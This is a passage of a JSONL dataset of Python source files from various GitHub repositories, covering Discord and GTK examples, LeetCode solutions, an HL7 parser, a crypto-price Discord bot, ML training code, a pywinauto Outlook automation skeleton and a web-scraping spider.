value=str(guild.created_at.strftime(\"%d-%m-%Y at %H:%M\")))\n embed.add_field(name=\"Member Count:\", value=str(guild.member_count))\n embed.add_field(name=\"Role Count:\", value=str(len(guild.roles)))\n embed.add_field(name=\"Channel Count:\", value=str(len(guild.channels)))\n embed.add_field(name=\"TextChannel Count:\", value=str(len(guild.text_channels)))\n embed.add_field(name=\"VoiceChannel Count:\", value=str(len(guild.voice_channels)))\n embed.add_field(name=\"Catergory Count:\", value=str(len(guild.categories)))\n await ctx.message.channel.send(embed=embed)\n\n @commands.check(is_owner)\n async def shutdown(self, ctx):\n \"\"\"Simple shutdown command\"\"\"\n await ctx.bot.logout()\n exit()\n\n\ndef setup(bot):\n bot.add_cog(General(bot))\n","repo_name":"dondish/Soko","sub_path":"cogs/general.py","file_name":"general.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"71055664761","text":"'''\n ***************************************************************************** \n * PURPOSE\n * Example of use of the Stack Container\n ***************************************************************************** \n * MODIFICATIONS\n * @author JL Sowers 04 MAY 2023\n ***************************************************************************** \n * DESIGN NOTES:\n * Also shows use of StackSwitcher, Button\n * Incidental use of GTKWindow, GTKCalendar, GTKTextView and GTKLabel as \n * placeholders (no interactive use)\n ***************************************************************************** \n'''\nimport gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk as gtk\n\nclass StackTest():\n \n def __init__(self):\n self.gladefile = \"StackTest.glade\"\n builder = gtk.Builder()\n builder.add_from_file(self.gladefile)\n self.topLevel = builder.get_object('toplevel')\n\n # No real code here, the stack is handled and setup in Glade\n # Note the Stack Labels are set in Glade under the Packing tab for each of the contents of the stack. \n \n # Set up the button bar\n self.quitBtn = builder.get_object(\"quitBtn\")\n self.quitBtn.connect('clicked', lambda w: self.bye_bye()) \n \n # Let'r rip!\n self.topLevel.show_all()\n \n \n def bye_bye(self):\n gtk.main_quit() \n\nif __name__ == '__main__':\n StackTest()\n gtk.main() \n","repo_name":"jsowers34/PythonGladeExamples","sub_path":"StackTest.py","file_name":"StackTest.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41853982614","text":"from django.contrib.auth.models import User\nfrom conektango.models import Customer\n\n\ndef global_ctx(request):\n \"\"\"\n CTX gobal\n :param request: User request\n :return: ctx global\n \"\"\"\n try:\n customer = Customer.objects.filter(user=request.user).first()\n except:\n customer = None\n ctx = {\n 'conekta_user': customer,\n }\n return ctx\n\n\n\n","repo_name":"kiubtech/conektango-demo","sub_path":"conektango-demo/context_processor.py","file_name":"context_processor.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24714943449","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def partition(self, head: Optional[ListNode], x: int) -> Optional[ListNode]:\n# create two dummy nodes for two parts of the answer before and after\n before=before_head=ListNode(0,None)\n after=after_head=ListNode(0,None)\n# Iterate over the given list while adding the node=x to after list\n while head:\n if head.val index:\n num = keyparts[index]\n if num[0].upper() == prefix:\n num = num[1:]\n return int(num)\n else:\n return None\n\n parts = key.split(\".\")\n segment = parts[0][:3]\n if len(parts[0]) > 3:\n segment_num = int(parts[0][3:])\n else:\n segment_num = 1\n field_num = parse_part(parts, 1, \"F\")\n repeat_num = parse_part(parts, 2, \"R\")\n component_num = parse_part(parts, 3, \"C\")\n subcomponent_num = parse_part(parts, 4, \"S\")\n return cls(\n segment, segment_num, field_num, repeat_num, component_num, subcomponent_num\n )\n","repo_name":"johnpaulett/python-hl7","sub_path":"hl7/accessor.py","file_name":"accessor.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","stars":264,"dataset":"github-code","pt":"40"} +{"seq_id":"9880726001","text":"from typing import Optional\n\n\nclass Node:\n def __init__(self, x: int, next: 'Node' = None, random: 'Node' = None):\n self.val = int(x)\n self.next = next\n self.random = random\n\n\nclass Solution:\n def copyRandomList(self, head: 'Optional[Node]') -> 'Optional[Node]':\n nodemap = {}\n\n def deepcopy(n: Node) -> Node:\n if not n:\n return n\n\n nonlocal nodemap\n if n in nodemap:\n return nodemap[n]\n\n nn = Node(x=n.val)\n nodemap[n] = nn\n nn.next = deepcopy(n.next)\n nn.random = deepcopy(n.random)\n return nn\n\n return deepcopy(head)\n\n\nif __name__ == '__main__':\n\n Solution().copyRandomList(Node(1, next=Node(2, next=Node(3))))","repo_name":"shadowofs/algo","sub_path":"138.py","file_name":"138.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20382480624","text":"#\n# @lc app=leetcode id=1695 lang=python3\n#\n# [1695] Maximum Erasure Value\n#\n\n# @lc code=start\n\nfrom typing import List\n\nclass Solution:\n def maximumUniqueSubarray(self, nums: List[int]) -> int:\n n = len(nums)\n prefix = [0] * n\n prefix[0] = nums[0]\n for i in range(1, n):\n prefix[i] = prefix[i - 1] + nums[i]\n prefix.append(0)\n mydict = {}\n j = -1\n ans = 0\n for i in range(n):\n if nums[i] not in mydict:\n mydict[nums[i]] = i\n a = prefix[i]\n b = prefix[j]\n ans = max(ans, a - b)\n else:\n a = prefix[i]\n j = max(j, mydict[nums[i]])\n b = prefix[j]\n mydict[nums[i]] = i\n ans = max(ans, a - b)\n return ans\n\n\nnums = [4,2,4,5,6]\nnums = [5,2,1,2,5,2,1,2,5]\ns = Solution()\nprint(s.maximumUniqueSubarray(nums))\n\n \n# @lc code=end\n\n","repo_name":"caitaozhan/LeetCode","sub_path":"array/1695.maximum-erasure-value.py","file_name":"1695.maximum-erasure-value.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"72770800121","text":"import datetime\n\n\ndef greeting():\n \"\"\"\n 時間帯に合った挨拶を出力する。\n \"\"\"\n todaydetail = datetime.datetime.today()\n if 4 <= todaydetail.hour <= 10:\n print(\"おはようございます\")\n elif 11 <= todaydetail.hour <= 17:\n print(\"こんにちは\")\n else:\n print(\"こんばんは\")\n\n\nif __name__ == '__main__':\n greeting()","repo_name":"yukishinonome/NLP","sub_path":"greeting.py","file_name":"greeting.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"ja","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"6148447930","text":"import numpy as np\n\n\n#%%\ndef preprocess_E(E_in):\n '''\n returns : renaming of edges in E so that every edge is unqiue. \n vertex equivalence classes\n permutation to sort edges by second vertex\n permutation to undo above sort\n '''\n E = np.copy(E_in)\n E = np.sort(E,axis=1) # edges always have lower vertex first\n E = E[np.argsort(10000*E[:,0]+E[:,1])] # now sort edges to help find duplicates\n \n V = np.unique(E)\n supernodes = np.array([set([v]) for v in V])\n supernode_nonempty_Q = np.ones(len(V),dtype='bool')\n\n v = np.max(V)+1\n \n i = 0\n e = [-1,-1]\n while i < len(E):\n e_ = e\n e = E[i]\n if np.all(e == e_): \n # add new vertex to equivalence classes\n for j in range(len(V)):\n if e[1] in supernodes[j]:\n supernodes[j] = supernodes[j] | {v}\n\n e = E[i-1]\n E[i,1] = v\n v += 1\n i += 1\n \n print('construct G')\n G = -1*np.ones((v+1,v+1),dtype='int')\n for k in range(np.shape(E)[0]):\n e0,e1 = E[k]\n G[e0,e1] = k\n G[e1,e0] = k\n \n print(\"number of duplicate edges:\", v - np.max(V) - 1)\n\n return E,G,supernodes,supernode_nonempty_Q\n\n#%%\n \nfor i in [0,1,2,3]:\n E_raw = np.loadtxt('b'+str(i)+'.in',dtype='int')\n E = preprocess_E(E_raw)\n np.savez('b'+str(i)+'_pre',E=E,G=G,supernodes=supernodes,supernode_nonempty_Q=supernode_nonempty_Q)\n\n#%%\ndef preprocess1_E(E_in):\n '''\n returns : renaming of edges in E so that every edge is unqiue. \n vertex equivalence classes\n permutation to sort edges by second vertex\n permutation to undo above sort\n '''\n print('construct E')\n E_ = np.copy(E_in)\n E_ = np.sort(E_,axis=1) # edges always have lower vertex first\n E_int = 10000*E_[:,0]+E_[:,1] # now sort edges to help find duplicates\n \n E_int_unique,index,edge_counts = np.unique(E_int,return_index=True,return_counts=True) \n \n E = E_[index]\n \n print('construct V')\n V = np.unique(E)\n minV = np.min(V)\n \n V -= minV\n E -= minV\n \n size_V = len(V)\n supernodes = np.array([set([v]) for v in V])\n supernode_nonempty_Q = np.ones(size_V,dtype='bool')\n \n print('construct G')\n G = -1*np.ones((np.max(V)+1,np.max(V)+1),dtype='int')\n for k in range(len(E)):\n e0,e1 = E[k]\n G[e0,e1] = k\n G[e1,e0] = k\n \n return E,G,edge_counts,supernodes,supernode_nonempty_Q\n\n#%% Preprocess Data\n\nfor i in [0,1,2,3]:\n E_raw = np.loadtxt('b'+str(i)+'.in',dtype='int')\n E,G,edge_counts,supernodes,supernode_nonempty_Q = preprocess1_E(E_raw)\n # np.savez('b'+str(i)+'_pre1',E=E,G=G,edge_counts=edge_counts,supernodes=supernodes,supernode_nonempty_Q=supernode_nonempty_Q)\n np.savetxt('b'+str(i)+'_min_cut_size.dat',[len(G)],fmt='%d')\n","repo_name":"interesting-courses/UW_coursework","sub_path":"cse521/hw1/p1_data/old/p1_preprocess.py","file_name":"p1_preprocess.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"36049444123","text":"from spider_template import GGVenturesSpider\n\n\nclass Usa0010Spider(GGVenturesSpider):\n name = 'usa_0010'\n start_urls = [\"https://www.bradley.edu/academic/colleges/fcba/\"]\n country = 'US'\n # eventbrite_id = 6221361805\n\n # handle_httpstatus_list = [301,302,403,404]\n\n static_name = \"Bradley University, Foster College of Business Administration\"\n \n static_logo = \"https://www.bradley.edu/asset/img/logo_v2.svg\"\n\n # MAIN EVENTS LIST PAGE\n parse_code_link = \"https://www.bradley.edu/calendar/\"\n\n university_contact_info_xpath = \"//body\"\n # contact_info_text = True\n contact_info_textContent = True\n # contact_info_multispan = True\n # TRANSLATE = True\n\n def parse_code(self,response):\n try:\n ####################\n self.driver.get(response.url)\n \n # self.check_website_changed(upcoming_events_xpath=\"//p[text()='No events are currently published.']\",empty_text=False)\n \n # self.ClickMore(click_xpath=\"//a[text()='View more events...']\",run_script=True)\n \n # for link in self.multi_event_pages(num_of_pages=8,event_links_xpath=\"//div[@class='em-card_image']/a\",next_page_xpath=\"(//div[@class='em-search-pagination']//i)[2]/..\",get_next_month=False,click_next_month=True,wait_after_loading=True,run_script=True):\n for link in self.events_list(event_links_xpath=\"//h3/a\"):\n self.getter.get(link)\n if self.unique_event_checker(url_substring=[\"https://www.bradley.edu/calendar/\"]):\n \n self.Func.print_log(f\"Currently scraping --> {self.getter.current_url}\",\"info\")\n\n item_data = self.item_data_empty.copy()\n \n item_data['event_link'] = link\n\n item_data['event_name'] = self.scrape_xpath(xpath_list=[\"//h2\"])\n item_data['event_desc'] = self.scrape_xpath(xpath_list=[\"//div[@class='col-md-7']\"],enable_desc_image=True)\n item_data['event_date'] = self.scrape_xpath(xpath_list=[\"//div[starts-with(@class,'row-color-bWhite')]//i[contains(@class,'calendar')]/..\"],method='attr')\n item_data['event_time'] = self.scrape_xpath(xpath_list=[\"//div[starts-with(@class,'row-color-bWhite')]//i[contains(@class,'clock')]/..\"],method='attr',error_when_none=False)\n item_data['startups_contact_info'] = self.scrape_xpath(xpath_list=[\"//dt[text()='Contact']/..\"],method='attr',error_when_none=False)\n\n yield self.load_item(item_data=item_data,item_selector=link)\n\n ####################\n except Exception as e:\n self.exception_handler(e)\n","repo_name":"kingcobra1325/ggventures-bot","sub_path":"ggventures/spiders/usa_0010.py","file_name":"usa_0010.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22436957450","text":"# ----------------------------------------------------------------------------\n# Name: openAttachment.py\n# Description: python script skeleton, to open email attachment.\n# Author: Spencer Brown\n# URL: https://github.com/spence-rat/pywin-auto-open-email-attachment\n# Date: 01/14/2022\n# ----------------------------------------------------------------------------\n\nfrom pywinauto import Application, Desktop\nimport time\n#starts the application you are wanting to automate\nstart_program = \"\"\n\napp = Application(backend=\"uia\").start(start_program)\n#example\napp = Application(backend=\"uia\").start(r'C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK')\n##gives time for application to fully load before windows are available to pywinauto##\ntime.sleep(10)\n\n#----------------------------define your application main dialog window--------\n##could be possible to use regex here -> app.window(title_re=\"*-Outlook\")\n#you can see what windows are available to you throughout this process by running:\n#print app.windows()\nmain_dlg = app[name_of_window]\n#example: main_dlg = app['Inbox - Spencer.Brown@sophos.com - Outlook']\n#From here, you will need to find the 'control identifiers' or the 'handle' on the window in question\n#to do this call the print_control_identifiers method \n#example: main_dlg.print_control_identifiers()\n#example: main_dlg.print_control_identifiers(filename=\"path_to_file\"), to output into a log file. \n#-----------------------------Identify a particular email----------------------\nemail = main_dlg.child_window(control_identifier_of_element)\n#example = main_dlg.child_window(title=\"title\", auto_id=\"4306\", control_type=\"Pane\")\n#example = main_dlg['identifier']\n#click to open new email window\nemail.click_input(double=True)\ntime.sleep(10)\n#-----------------------------Reference the new open window--------------------\n#to identifiy all windows, including the newly opened one, run print(app.windows())\nopen_dlg = app['name_of_newly_opened_window']\n#-----------------------------Define the attachments part of the open email\n#run attachments.print_control_identifers() to see available controls\n#in an example of outputs having the same name, you can call the unique handle generated by pywinauto\n#in this case it was 'Button1' to open the attachment\nattachments = open_dlg.child_window('control_identifier_on_email_for_the_attachment')\n#or attachments[control_identifier].method()\n#double click the attachment\nattachments.Button1.click_input(double=True)\n","repo_name":"ralph-brynard/pywinauto-open-email-attachment","sub_path":"open-attachment.py","file_name":"open-attachment.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70684346679","text":"\"\"\"You’re given a read only array of n integers. Find out if any integer occurs more than n/3 times in the array in linear time and constant additional space.\n\nIf so, return the integer. If not, return -1.\n\nIf there are multiple solutions, return any one.\n\nExample :\n\nInput : [1 2 3 1 1]\nOutput : 1 \n1 occurs 3 times which is more than 5/3 times.\n\nreference : http://stackoverflow.com/questions/2600191/how-can-i-count-the-occurrences-of-a-list-item-in-python \"\"\"\n\nfrom collections import Counter\nclass Solution:\n # @param A : tuple of integers\n # @return an integer\n def repeatedNumber(self, A):\n A = list(A)\n B= Counter(A).most_common()\n for i in xrange(len(B)):\n if(B[i][1] > len(A)/3):\n result = B[i][0]\n return result\n return -1\n","repo_name":"M4573R/Interviewbit2","sub_path":"Repeat3.py","file_name":"Repeat3.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15893319940","text":"import torch\n\nfrom numpy.testing import assert_almost_equal\n\nclass HistogramLoss(torch.nn.Module):\n def __init__(self, num_steps, cuda=True):\n super(HistogramLoss, self).__init__()\n self.step = 2 / (num_steps - 1)\n self.eps = 1 / num_steps\n self.cuda = cuda\n self.t = torch.arange(-1, 1+self.step, self.step).view(-1, 1)\n self.tsize = self.t.size()[0]\n if self.cuda:\n self.t = self.t.cuda()\n \n def forward(self, features, classes):\n def histogram(inds, size):\n s_repeat_ = s_repeat.clone()\n indsa = (s_repeat_floor - (self.t - self.step) > -self.eps) & (s_repeat_floor - (self.t - self.step) < self.eps) & inds\n assert indsa.nonzero().size()[0] == size, ('Another number of bins should be used')\n zeros = torch.zeros((1, indsa.size()[1])).byte()\n if self.cuda:\n zeros = zeros.cuda()\n indsb = torch.cat((indsa, zeros))[1:, :]\n s_repeat_[~(indsb|indsa)] = 0\n # indsa corresponds to the first condition of the second equation of the paper\n s_repeat_[indsa] = (s_repeat_ - self.t + self.step)[indsa] / self.step\n # indsb corresponds to the second condition of the second equation of the paper\n s_repeat_[indsb] = (-s_repeat_ + self.t + self.step)[indsb] / self.step\n\n return s_repeat_.sum(1) / size\n \n classes_size = classes.size()[0]\n classes_eq = (classes.repeat(classes_size, 1) == classes.view(-1, 1).repeat(1, classes_size)).data\n dists = torch.mm(features, features.transpose(0, 1))\n assert ((dists > 1 + self.eps).sum().item() + (dists < -1 - self.eps).sum().item()) == 0, 'L2 normalization should be used'\n s_inds = torch.triu(torch.ones(classes_eq.size()), 1).byte()\n if self.cuda:\n s_inds= s_inds.cuda()\n pos_inds = classes_eq[s_inds].repeat(self.tsize, 1)\n neg_inds = ~classes_eq[s_inds].repeat(self.tsize, 1)\n pos_size = classes_eq[s_inds].sum().item()\n neg_size = (~classes_eq[s_inds]).sum().item()\n s = dists[s_inds].view(1, -1)\n s_repeat = s.repeat(self.tsize, 1)\n s_repeat_floor = (torch.floor(s_repeat.data / self.step) * self.step).float()\n \n histogram_pos = histogram(pos_inds, pos_size)\n assert_almost_equal(histogram_pos.sum().item(), 1, decimal=1, \n err_msg='Not good positive histogram', verbose=True)\n histogram_neg = histogram(neg_inds, neg_size)\n assert_almost_equal(histogram_neg.sum().item(), 1, decimal=1, \n err_msg='Not good negative histogram', verbose=True)\n histogram_pos_repeat = histogram_pos.view(-1, 1).repeat(1, histogram_pos.size()[0])\n histogram_pos_inds = torch.tril(torch.ones(histogram_pos_repeat.size()), -1).byte()\n if self.cuda:\n histogram_pos_inds = histogram_pos_inds.cuda()\n histogram_pos_repeat[histogram_pos_inds] = 0\n histogram_pos_cdf = histogram_pos_repeat.sum(0)\n loss = torch.sum(histogram_neg * histogram_pos_cdf)\n \n return loss\n \n","repo_name":"valerystrizh/pytorch-histogram-loss","sub_path":"losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","stars":176,"dataset":"github-code","pt":"40"} +{"seq_id":"73162388920","text":"from bot_logger import logger\nfrom cogs.modules.alert_functionality import AlertFunctionality\nfrom cogs.modules.coin_market_functionality import CoinMarketFunctionality\nfrom cogs.modules.coin_market import CoinMarket\nfrom cogs.modules.subscriber_functionality import SubscriberFunctionality\nimport asyncio\nimport datetime\nimport json\nimport re\n\n\nclass CoreFunctionalityException(Exception):\n \"\"\"Handles core related errors\"\"\"\n\n\nclass CoreFunctionality:\n \"\"\"Handles Core functionality\"\"\"\n\n def __init__(self, bot):\n with open('config.json') as config:\n self.config_data = json.load(config)\n self.bot = bot\n self.started = False\n self.market_list = None\n self.market_stats = None\n self.acronym_list = None\n self.coin_market = CoinMarket()\n self.cmc = CoinMarketFunctionality(bot, self.coin_market)\n self.alert = AlertFunctionality(bot,\n self.coin_market,\n self.config_data[\"alert_capacity\"])\n self.subscriber = SubscriberFunctionality(bot,\n self.coin_market,\n self.config_data[\"subscriber_capacity\"])\n self.bot.loop.create_task(self._continuous_updates())\n\n async def _update_data(self, minute=0):\n try:\n await self._update_market()\n self._load_acronyms()\n self.cmc.update(self.market_list,\n self.acronym_list,\n self.market_stats)\n self.alert.update(self.market_list, self.acronym_list)\n self.subscriber.update(self.market_list, self.acronym_list)\n await self.subscriber.update_game_status()\n await self.alert.alert_user()\n if self.started:\n await self.subscriber.display_live_data(minute)\n except Exception as e:\n print(\"Failed to update data. See error.log.\")\n logger.error(\"Exception: {}\".format(str(e)))\n\n async def _continuous_updates(self):\n await self._update_data()\n self.started = True\n print('CoinMarketDiscordBot is online.')\n logger.info('Bot is online.')\n while True:\n time = datetime.datetime.now()\n if time.minute % 5 == 0:\n await self._update_data(time.minute)\n await asyncio.sleep(60)\n else:\n await asyncio.sleep(20)\n\n async def _update_market(self):\n \"\"\"\n Loads all the cryptocurrencies that exist in the market\n\n @return - list of crypto-currencies\n \"\"\"\n try:\n retry_count = 0\n market_stats = self.coin_market.fetch_coinmarket_stats()\n currency_data = self.coin_market.fetch_currency_data(load_all=True)\n while market_stats is None or currency_data is None:\n if retry_count >= 10:\n msg = (\"Max retry attempts reached. Please make \"\n \"sure you're able to access coinmarketcap \"\n \"through their website, check if the coinmarketapi \"\n \"is down, and check if \"\n \"anything is blocking you from requesting \"\n \"data.\")\n raise CoreFunctionalityException(msg)\n logger.warning(\"Retrying to get data..\")\n if market_stats is None:\n market_stats = self.coin_market.fetch_coinmarket_stats()\n if currency_data is None:\n currency_data = self.coin_market.fetch_currency_data(load_all=True)\n retry_count += 1\n await asyncio.sleep(5)\n market_dict = {}\n for currency in currency_data:\n market_dict[currency['id']] = currency\n self.market_stats = market_stats\n self.market_list = market_dict\n except CoreFunctionalityException as e:\n logger.error(str(e))\n except Exception as e:\n print(\"Failed to update market. See error.log.\")\n logger.error(\"Exception: {}\".format(str(e)))\n\n def _load_acronyms(self):\n \"\"\"\n Loads all acronyms of existing crypto-coins out there\n\n @return - list of crypto-acronyms\n \"\"\"\n try:\n if self.market_list is None:\n raise Exception(\"Market list was not loaded.\")\n acronym_list = {}\n duplicate_count = 0\n for currency, data in self.market_list.items():\n if data['symbol'] in acronym_list:\n duplicate_count += 1\n if data['symbol'] not in acronym_list[data['symbol']]:\n acronym_list[data['symbol'] + str(1)] = acronym_list[data['symbol']]\n acronym_list[data['symbol']] = (\"Duplicate acronyms \"\n \"found. Possible \"\n \"searches are:\\n\"\n \"{}1 ({})\\n\".format(data['symbol'],\n acronym_list[data['symbol']]))\n dupe_acronym = re.search('\\\\d+', acronym_list[data['symbol']])\n dupe_num = str(int(dupe_acronym.group(len(dupe_acronym.group()) - 1)) + 1)\n dupe_key = data['symbol'] + dupe_num\n acronym_list[dupe_key] = currency\n acronym_list[data['symbol']] = (acronym_list[data['symbol']]\n + \"{} ({})\".format(dupe_key,\n currency))\n else:\n acronym_list[data['symbol']] = currency\n self.acronym_list = acronym_list\n except Exception as e:\n print(\"Failed to load cryptocurrency acronyms. See error.log.\")\n logger.error(\"Exception: {}\".format(str(e)))\n","repo_name":"fobpatrol/autopumpbot","sub_path":"cogs/modules/core_functionality.py","file_name":"core_functionality.py","file_ext":"py","file_size_in_byte":6149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33163499230","text":"# While Loops\n# while condition:\n# run the code as long as condition is satisfied\nhealth = 5\n\nwhile health > 0:\n print(f\"Still fighting..! Health: {health}\")\n\n health = health - 1\nprint(\"You are dead now.\")\n\n# Exercise\n# 0: (5 points - each)\n# Make a variable called strength, and set its initial value to 5.\n# Print a message reporting the player's strength.\n# Set up a while loop that runs until the player's strength increases to a value such as 10.\n# Inside the while loop, print a message that reports the player's current strength.\n# Inside the while loop, write a statement that increases the player's strength.\n# Outside the while loop, print a message reporting that the player has grown too strong, and that they have moved up to a new level of the game.\n# Bonus: Play around with different cutoff levels for the value of strength, and play around with different ways to increase the strength value within the while loop.\nstrength = 5\nprint(f\"Strength: {strength}\")\nwhile strength < 10:\n print(f\"Strength: {strength}\")\n strength = strength + 1\nprint(\"You have grown too strong!\")\nprint(\"You have moved up to a new level of the game.\")\n\n\n# INPUT TAKING\n# variable = input('Message')\n# it takes a str\nnames = [\"bedir\"]\nanother_name = input(\"A name I should know: \")\nnames.append(another_name)\n\nprint(names)\n\n# Exercise 1:\n# 0:\n# Make a list that includes 3 or 4 games that you like to play.\n# Print a statement that tells the user what games you like.\n# Ask the user to tell you a game they like, and store the game in a variable such as new_game.\n# Add the user's game to your list.\n# Print a new statement that lists all of the games that we like to play (we means you and your user).\ngames = [\"csgo\", \"dota 2\", \"league (awful)\", \"sims4\"]\nfor game in games:\n print(game)\nnew_game = input(\"A game you like: \")\ngames.append(new_game)\nfor game in games:\n print(game)\n\n# While loops - keep it running\nnew_name = \"\"\nnames = []\nwhile new_name != \"quit\":\n new_name = input(\"Give me a name (type quit if you want to stop): \")\n if new_name != \"quit\":\n names.append(new_name)\nprint(names)\n\n# Dictionaries\nl = [3, 4]\nl[0]\n\n# dct = {}\n# dct = {\n# key: value\n# }\ndct = {\"bedroom\": \"beautiful room\", 3: \"hi there\"}\nprint(dct[\"bedroom\"])\nprint(dct[3])\n\nfor key, value in dct.items():\n print(key, \":\", value)\n\n#####\n# dictionary_name = {\n# key1: value1,\n# key2: value2,\n# ...\n# }\n\nattributes = {\"bedir\": \"is tall\", \"tarik\": \"has dark hair\", \"huze\": \"wears glasses\"}\n\nname = \"bedir\"\nprint(f\"{name} {attributes[name]}\")\n\nfor key, value in attributes.items():\n print(f\"{key} {value}\")\n\n# Exercise:\n# 0:\n# Create a dictionary to hold information about pets. Each key is an animal's name, and each value is the kind of animal.\n# For example, 'ziggy': 'canary'\n# Put at least 3 key-value pairs in your dictionary.\n# Use a for loop to print out a series of statements such as \"Willie is a dog.\"\nanimals = {\"hannah\": \"dog\", \"boncuk\": \"cat\", \"foggy\": \"goat\"}\nfor key, value in animals.items():\n print(f\"{key.title()} is a {value}.\")\n","repo_name":"Python-Class-bdr/Lectures","sub_path":"lecture_notes/lecture_5.py","file_name":"lecture_5.py","file_ext":"py","file_size_in_byte":3078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25300142182","text":"\r\nimport pickle\r\n\r\nimport numpy as np # Fundamental package for linear algebra and multidimensional arrays\r\nimport pandas as pd # Data analysis and manipultion tool\r\n\r\n# In read_csv() function, we have passed the location to where the files are located in the dphi official github page.\r\ntrain_data = pd.read_csv(\"https://raw.githubusercontent.com/dphi-official/Datasets/master/hippocorpus/train_set_label.csv\" )\r\n\r\nX = train_data.drop(['recAgnPairId','recImgPairId','similarityReason','story','WorkerId','AssignmentId','summary',\r\n 'annotatorRace','mainEvent','mostSurprising','memType'],axis = 1)\r\ny = train_data['memType'] # Output/Dependent variable\r\n\r\nGender = X.annotatorGender\r\nGender_final = []\r\nfor item in Gender:\r\n if item == 'Man' or item == 'man' or item == 'MAN':\r\n Gender_final.append(0)\r\n elif item == 'woman' or item == 'WOMAN' or item == 'Woman':\r\n Gender_final.append(1)\r\n else:\r\n Gender_final.append(2)\r\n\r\nX.drop('annotatorGender',axis = 1, inplace = True)\r\nX['Gender'] = Gender_final\r\n\r\ndistracted_text = X.distracted\r\n\r\ndistarcted_final = []\r\nfor item in distracted_text:\r\n if item == 'one':\r\n distarcted_final.append(1)\r\n elif item == '2.0':\r\n distarcted_final.append(2)\r\n elif item == '3.0':\r\n distarcted_final.append(3)\r\n elif item == '4.0':\r\n distarcted_final.append(4) \r\n else:\r\n distarcted_final.append(5)\r\n\r\nX.drop('distracted',axis = 1, inplace = True)\r\nX['distracted_num'] = distarcted_final\r\n\r\ndraining_text = X.draining\r\n\r\ndraining_final = []\r\nfor item in draining_text:\r\n if item == 'one':\r\n draining_final.append(1)\r\n elif item == '2.0':\r\n draining_final.append(2)\r\n elif item == '3.0':\r\n draining_final.append(3)\r\n elif item == '4.0':\r\n draining_final.append(4) \r\n else:\r\n draining_final.append(5)\r\n\r\nX.drop('draining',axis = 1, inplace = True)\r\nX['draining'] = draining_final\r\n\r\ny_enc = []\r\nfor item in y:\r\n if item == 'recalled':\r\n y_enc.append(0)\r\n elif item == 'imagined':\r\n y_enc.append(1)\r\n else:\r\n y_enc.append(2)\r\ny_enc \r\n#y = np.array(y_enc)\r\n\r\n# import train_test_split\r\nfrom sklearn.model_selection import train_test_split\r\n\r\nX_train, X_val, y_train, y_val = train_test_split(X,y,test_size=0.3, random_state = 42)\r\n\r\nX_train.annotatorAge.fillna(X_train.annotatorAge.mean(), inplace=True)\r\nX_train.importance.fillna(X_train.importance.mean(), inplace=True)\r\nX_train.frequency.fillna(X_train.frequency.mean(), inplace=True)\r\nX_train.similarity.fillna(X_train.similarity.mean(), inplace=True)\r\n\r\nX_val.annotatorAge.fillna(X_val.annotatorAge.mean(), inplace=True)\r\nX_val.importance.fillna(X_val.importance.mean(), inplace=True)\r\nX_val.frequency.fillna(X_val.frequency.mean(), inplace=True)\r\nX_val.similarity.fillna(X_val.similarity.mean(), inplace=True)\r\n\r\nfrom sklearn.preprocessing import StandardScaler\r\n\r\nss = StandardScaler()\r\nX_train = ss.fit_transform(X_train)\r\nX_val = ss.fit_transform(X_val)\r\n\r\nparams = {\"max_depth\": [25],\r\n \"min_samples_split\": [3],\r\n \"min_samples_leaf\": [1,2,3],\r\n \"bootstrap\": [True],\r\n \"n_estimators\": [125],\r\n \"n_jobs\": [-1],\r\n \"verbose\": [2],\r\n \"criterion\": [\"entropy\"]\r\n }\r\n\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.model_selection import GridSearchCV\r\n\r\nrfc1 = RandomForestClassifier()\r\nclf = GridSearchCV(rfc1, params,cv = 4)\r\nclf.fit(X_train,y_train)\r\n\r\npred_clf = clf.predict(X_val)\r\n\r\nfrom sklearn.metrics import f1_score\r\n\r\nresult = clf.score(X_val, y_val)\r\nprint('The Score is;', result)\r\n\r\nprint('F1 Score for random forest classifier is: ', f1_score(y_val, pred_clf, average = 'weighted'))\r\n\r\n#save the model \r\nfilename = 'model.pkl'\r\npickle.dump(clf, open(filename, 'wb'))\r\n","repo_name":"TanmayR07/Human-Cognitive-Predictor","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21964383544","text":"import pygame\n\npygame.init()\n\nWIDTH = 600\nHEIGHT = 800\n\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\npygame.display.set_caption(\"События от 